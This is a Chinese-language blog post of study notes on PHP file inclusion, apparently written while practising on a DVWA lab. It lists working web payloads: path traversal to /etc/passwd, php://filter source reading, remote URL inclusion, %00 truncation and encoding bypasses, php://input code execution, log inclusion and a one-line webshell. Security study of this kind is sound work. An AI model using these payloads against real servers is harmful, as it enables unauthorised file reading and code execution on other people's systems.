File Inclusion学习过程


allow_url_include = Off 
allow_url_fopen= Off
相对路径包含
http://127.0.0.1/vulnerabilities/fi/?page=../../1.php
绝对路径包含
http://192.168.147.130/dvwa/vulnerabilities/fi/?page=C:\Users\Administrator\1.php
http://192.168.147.130/dvwa/vulnerabilities/fi/?page=file://C:\Users\Administrator\1.php
任意文件读取
http://192.168.147.130/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=1.php

allow_url_include = On
allow_url_fopen= On
http://192.168.147.130/dvwa/vulnerabilities/fi/?page=http://www.stnn.cc/	可以访问
http://192.168.147.130/dvwa/vulnerabilities/fi/?page=https://pindao.hao123.com/sports 	不可以访问

allow_url_include = Off 
allow_url_fopen= Off
http://192.168.147.130/dvwa/vulnerabilities/fi/?page=http://www.stnn.cc/	不可以访问
http://192.168.147.130/dvwa/vulnerabilities/fi/?page=https://pindao.hao123.com/sports 不可以访问

allow_url_include = Off
allow_url_fopen= On
http://192.168.147.130/dvwa/vulnerabilities/fi/?page=http://www.stnn.cc/	不可以访问
http://192.168.147.130/dvwa/vulnerabilities/fi/?page=https://pindao.hao123.com/sports 不可以访问

利用其它漏洞上传个一句话木马
在这里插入图片描述测试phpinfo();能不能正常执行
在这里插入图片描述

常见方法
1、【?file=…/…/…/…/…/etc/passwdd】
2、【?page=file:///etc/passwd】
3、【?home=main.cgi】
4、【?page=http://www.a.com/1.php】
5、【http://1.1.1.1/…/…/…/…/dir/file.txt】
6、【?page=file:///C:/123.txt】
编码绕过字符过滤
1、【可以使用多种编码方式进行绕过】把字符换成url编码进行尝试
2、【使用大小写进行尝试】
3、【%00嵌入任意位置】
在php版本小于5.3.4的服务器中,当magic_quote_gpc选项为off时,我们可以在文件名中使用%00进行截断,也就是说文件名中%00后的内容不会被识别,即下面两个url是完全等效的。
http://x.com/?page=…/…/…/dvwa/php.ini.php
http://x.com/?page=…/…/…/dvwa/php.ini%002.php
4、【.的利用】点代表当前目录,点点代表上一层目录。
5、【对于a-zA-Z这样的字符,浏览器在发送请求前会做解码;而对于URL不支持的字符,比如%20,浏览器不做解码的,%20解码发生在服务器上(apache/nginx)】
常见的包含位置
(1)php://input然后post提交<?php system('pwd');?>显示当前所在目录。
(1)访问敏感文件phpinfo。
(2)包含日志文件,access.log(Apache日志文件)。
白盒测试时,先检查allow_url_fopen、allow_url_include等危险函数是否开启。
(3)利用php伪协议读源码。【http://x.com/?page=php://filter/read=string.rot13/resource=include.php】

原文链接:https://blog.csdn.net/ai_64/article/details/92411131

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页